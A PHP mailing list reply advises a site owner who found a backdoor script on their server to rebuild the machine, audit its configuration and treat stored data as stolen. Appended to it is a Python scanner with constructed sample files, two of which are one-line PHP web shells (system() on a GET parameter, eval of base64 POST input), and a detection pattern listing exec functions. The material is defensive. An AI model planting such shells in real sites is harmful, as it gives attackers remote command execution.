Assuming you are not just trolling,

> Fortunately I don't think they were doing something correctly, cause it
> didn't deface my site like some of the others.... 

Don't count on it. They only deface servers they don't want to use.

> ...
> everyone can execute shell commands via system(); on your server.
> -> delete the script ;)

Oh, by all means, delete it if you want. But it's not the hole it came
in through, and it's not the real backdoor.

It's so blatant, I'd guess it's a script kiddy or a decoy. Even if it's
a script kiddy, you _want_ to know how it got on the box.

I'd take the box offline, back up all the data and configuration files,
and re-install the whole system and all programs from scratch. Go over
every configuration file with a fine-tooth comb. 

If the machine is on a subnet and I controlled the subnet, I think I'd
take the whole subnet down, including the firewall, and clean every
machine up, not putting any machine back on the subnet until it was
clean and any holes patched. If I didn't control the subnet, I'd make
sure the persons who did know there had been a break-in.

And if you have any valuable data, consider it to have been stolen. If
you have credit card numbers, report the possibility of theft to the
credit card companies. Etc.

If you're trolling, go away.

-- 
Joel Rees, programmer, Systems Group
Altech Corporation (Alpsgiken), Osaka, Japan
http://www.alpsgiken.co.jp

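As an added example (not part of the thread), a small Python scan for the blatant form of backdoor the original poster found: a PHP file that hands request input straight to system() or a similar function. The file contents are constructed samples standing in for a web root; the scan only finds the obvious script, which is exactly the point made above about it not being the real hole.

```python
import re
from typing import Dict, List

# Constructed sample files standing in for a web root (not from the thread).
SAMPLE_FILES: Dict[str, str] = {
    "index.php": "<?php\n$rows = $db->query('SELECT 1');\necho htmlspecialchars($rows);\n",
    "tools/backup.php": "<?php\n// fixed command string, no user input\nsystem('tar czf /var/backups/site.tgz /var/www');\n",
    "images/x.php": "<?php\nif(isset($_GET['cmd'])){ system($_GET['cmd']); }\n",
    "cache/s.php": "<?php\neval(base64_decode($_POST['p']));\n",
}

# PHP functions that pass a string to the shell or to the interpreter.
EXEC_FUNCS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Request-controlled inputs in PHP.
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b"

# A call to one of EXEC_FUNCS, capturing its argument text up to the closing ');'.
# Arguments containing a literal ';' are not matched; that is a known limitation.
TAINTED_CALL = re.compile(EXEC_FUNCS + r"\s*\(([^;]*?)\)\s*;", re.IGNORECASE | re.DOTALL)


def find_tainted_calls(source: str) -> List[str]:
    """Return each exec/eval call whose argument list references request input."""
    hits: List[str] = []
    for m in TAINTED_CALL.finditer(source):
        if re.search(REQUEST_INPUT, m.group(1)):
            hits.append(m.group(0).strip())
    return hits


def scan(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each file path to its suspicious calls; files with none are omitted."""
    report: Dict[str, List[str]] = {}
    for path, src in files.items():
        hits = find_tainted_calls(src)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, calls in scan(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(calls)}")
```

A fixed command string such as the one in tools/backup.php is not flagged, only calls whose arguments come from a request superglobal.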

-- 
PHP General Mailing List (http://www.php.net/)